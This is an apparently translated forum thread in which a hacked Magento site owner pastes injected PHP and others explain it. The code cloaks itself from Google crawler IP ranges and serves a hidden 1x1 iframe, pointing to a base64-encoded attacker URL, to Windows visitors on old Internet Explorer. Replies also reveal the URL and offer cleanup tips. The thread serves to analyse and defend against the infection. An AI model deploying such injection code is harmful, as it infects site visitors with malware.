我刚刚在安装Magento 1.3.2.4时被黑客入侵。你能告诉我这个代码的目的是什么吗?
此外,如何阻止这种情况以及如何发现漏洞?
谢谢
function net_match ( $network , $ip ) {
$ip_arr = explode ( '/' , $network );
$network_long = ip2long ( $ip_arr [ 0 ]);
$x = ip2long ( $ip_arr [ 1 ]);
$mask = long2ip ( $x ) == $ip_arr [ 1 ] ? $x : 0xffffffff << ( 32 - $ip_arr [ 1 ]);
$ip_long = ip2long ( $ip );
return ( $ip_long & $mask ) == ( $network_long & $mask );
}
$ip=$_SERVER['REMOTE_ADDR'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$user_agent = $_SERVER["HTTP_USER_AGENT"];
$IP = $_SERVER['REMOTE_ADDR'].".log";
@mkdir('/tmp/Location/');
$dfjgkbl=base64_decode('aHR0cDovLzEyOS4xMjEuMzguMTAyL0hvbWUvaW5kZXgucGhw');
if(!file_exists("/tmp/Location/{$IP}"))
{
if(
net_match('64.233.160.0/19',$ip)==0 &&
net_match('66.102.0.0/20',$ip)==0 &&
net_match('66.249.64.0/19',$ip)==0 &&
net_match('72.14.192.0/18',$ip)==0 &&
net_match('74.125.0.0/16',$ip)==0 &&
net_match('89.207.224.0/24',$ip)==0 &&
net_match('193.142.125.0/24',$ip)==0 &&
net_match('194.110.194.0/24',$ip)==0 &&
net_match('209.85.128.0/17',$ip)==0 &&
net_match('216.239.32.0/19',$ip)==0 &&
net_match('128.111.0.0/16',$ip)==0 &&
net_match('67.217.0.0/16',$ip)==0 &&
net_match('188.93.0.0/16',$ip)==0
)
{
if(strpos($user_agent, "Windows") !== false)
{
if (preg_match("/MSIE 6.0/", $user_agent) OR
preg_match("/MSIE 7.0/", $user_agent) OR
preg_match("/MSIE 8.0/", $user_agent)
)
{
echo '<iframe frameborder=0 src="'.$dfjgkbl.'" width=1 height=1 scrolling=no></iframe>';
touch ("/tmp/Location/{$IP}");
}}}}
它创建了一个iframe,将人们引导到另一个网站。dfjgkbl变量包含URL的base64编码;如果你想知道它是什么,可以使用在线base64解码器。我不会把它粘贴在这里,因为根据你的其余代码,URL可能包含Windows病毒。
只是一个友好的建议,如果你使用FileZilla作为FTP代理,它会将保存的密码保存在一个xml文件中,那么你的电脑上可能有一种病毒,它可以将FileZilla连接到你的服务器并将其写入你的文件。还要检查您的CPanel并查找非您创建的FTP帐户。事实可能并非如此,只要在任何情况下进行检查即可。
我在Total Commander上也遇到了类似的问题。。。病毒使用TC FTP帐户,完全改变了我的网站(Joomla CMS),并在几乎每个php文件中添加了类似的恶意代码。
$dfjgkbl=base64_decode('aHR0cDovLzEyOS4xMjEuMzguMTAyL0hvbWUvaW5kZXgucGhw');
转到:
不要点击(这是哈克链接)>>129.121.38.102/Home/index。php
黑客会创建一个日志,记录你网站上的所有信息。
首先升级您的Magento,在这一点上它就像是非常旧的版本。
你被黑客入侵的代码是我们每次看到的通用php病毒代码,它是一种从你的电脑到服务器或从服务器的自动病毒
你也可以使用一个免费的插件,比如:magefirewall来保护你的magento。
第页。S Im是的开发者之一